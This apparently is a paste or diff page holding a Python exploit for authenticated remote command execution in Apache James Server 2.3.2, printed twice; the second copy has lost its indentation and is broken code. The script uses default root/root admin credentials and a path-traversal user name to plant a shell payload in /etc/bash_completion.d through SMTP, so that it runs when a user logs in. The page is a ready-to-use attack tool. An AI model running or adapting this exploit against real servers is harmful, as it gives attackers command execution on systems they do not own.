vmesel · November 3, 2017 04:21
diff --git a/aaaaaaaa b/aaaaaaaa
 #!/usr/bin/python
 #
 # Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
 # Date: 16\10\2014
 # Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
 # Vendor Homepage: http://james.apache.org/server/
 # Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
 # Version: Apache James Server 2.3.2
 # Tested on: Ubuntu, Debian
 # Info: This exploit works on default installation of Apache James Server 2.3.2
 # Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
 
 import socket
 import sys
 import time
 
 # specify payload
 payload = 'touch /tmp/proof.txt' # to exploit on any user 
 #payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
 # credentials to James Remote Administration Tool (Default - root/root)
 user = 'root'
 pwd = 'root'
 
 if len(sys.argv) != 2:
    sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
    sys.exit(1)
 
 ip = sys.argv[1]
 
 def recv(s):
        s.recv(1024)
        time.sleep(0.2)
 
 try:
    print "[+]Connecting to James Remote Administration Tool..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,4555))
    s.recv(1024)
    s.send(user + "\n")
    s.recv(1024)
    s.send(pwd + "\n")
    s.recv(1024)
    print "[+]Creating user..."
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
    s.recv(1024)
    s.send("quit\n")
    s.close()
 
    print "[+]Connecting to James SMTP server..."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,25))
    s.send("ehlo [email protected]\r\n")
    recv(s)
    print "[+]Sending payload..."
    s.send("mail from: <'@team.pl>\r\n")
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
    recv(s)
    s.send("data\r\n")
    recv(s)
    s.send("From: [email protected]\r\n")
    s.send("\r\n")
    s.send("'\n")
    s.send(payload + "\n")
    s.send("\r\n.\r\n")
    recv(s)
    s.send("quit\r\n")
    recv(s)
    s.close()
    print "[+]Done! Payload will be executed once somebody logs in."
 except:
    print "Connection failed."
	#!/usr/bin/python
	#
	# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
	# Date: 16\10\2014
	# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
	# Vendor Homepage: http://james.apache.org/server/
	# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
	# Version: Apache James Server 2.3.2
	# Tested on: Ubuntu, Debian
	# Info: This exploit works on default installation of Apache James Server 2.3.2
	# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

	import socket
	import sys
	import time

	# specify payload
	payload = 'touch /tmp/proof.txt' # to exploit on any user
	#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
	# credentials to James Remote Administration Tool (Default - root/root)
	user = 'root'
	pwd = 'root'

	if len(sys.argv) != 2:
	sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
	sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
	sys.exit(1)

	ip = sys.argv[1]

	def recv(s):
	s.recv(1024)
	time.sleep(0.2)

	try:
	print "[+]Connecting to James Remote Administration Tool..."
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((ip,4555))
	s.recv(1024)
	s.send(user + "\n")
	s.recv(1024)
	s.send(pwd + "\n")
	s.recv(1024)
	print "[+]Creating user..."
	s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
	s.recv(1024)
	s.send("quit\n")
	s.close()

	print "[+]Connecting to James SMTP server..."
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((ip,25))
	s.send("ehlo [email protected]\r\n")
	recv(s)
	print "[+]Sending payload..."
	s.send("mail from: <'@team.pl>\r\n")
	recv(s)
	# also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
	s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
	recv(s)
	s.send("data\r\n")
	recv(s)
	s.send("From: [email protected]\r\n")
	s.send("\r\n")
	s.send("'\n")
	s.send(payload + "\n")
	s.send("\r\n.\r\n")
	recv(s)
	s.send("quit\r\n")
	recv(s)
	s.close()
	print "[+]Done! Payload will be executed once somebody logs in."
	except:
	print "Connection failed."
No results found